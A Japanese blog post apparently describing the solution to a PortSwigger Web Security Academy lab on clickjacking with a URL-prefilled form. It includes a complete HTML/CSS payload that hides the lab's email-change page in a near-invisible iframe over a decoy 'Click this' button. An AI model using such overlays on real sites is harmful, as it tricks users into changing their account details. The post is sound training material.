Shikata Ga Nai

Private? There is no such things.

Clickjacking with form input data prefilled from a URL parameterをやってみた

PortSwigger

Hello there, ('ω')ノ

 

URLパラメータを追加したフォームを使用したクリックジャッキングを。

まずは、ログインして。

 

f:id:ThisIsOne:20210213095632p:plain

 

今回、ターゲットとなるURLは下記のとおりで。

 https://acaf1f3b1e08f8b480377b41005600f9.web-security-academy.net/email

 

f:id:ThisIsOne:20210213100045p:plain

 

インターセプトして、リクエスト内容をみると。

CSRFトークンで保護されているようで。

 

f:id:ThisIsOne:20210213100025p:plain

 

今回は、URLパラメータを追加したURLを事前に用意して。

ユーザに気づかれないようにメールの更新ボタンをクリックさせるようにすることに。

 

<style>
iframe {
 position:relative;
 width:700px;
 height: 700px;
 opacity: 0.5;
 z-index: 2;
}
div {
 position:absolute;
 top:440px;
 left:80px;
 z-index: 1;
}
</style>


<div>Click this</div>


<iframe src="https://acaf1f3b1e08f8b480377b41005600f9.web-security-academy.net/email?email=user@mail.com"></iframe>

 

f:id:ThisIsOne:20210213100218p:plain

 

半透明にして、メールアドレス変更ボタンをクリックさせる位置を調整して。

 

f:id:ThisIsOne:20210213100616p:plain

 

透明度を変更して、保存すると。

 opacity: 0.0001

 

f:id:ThisIsOne:20210213100647p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210213100718p:plain

 

Best regards, (^^ゞ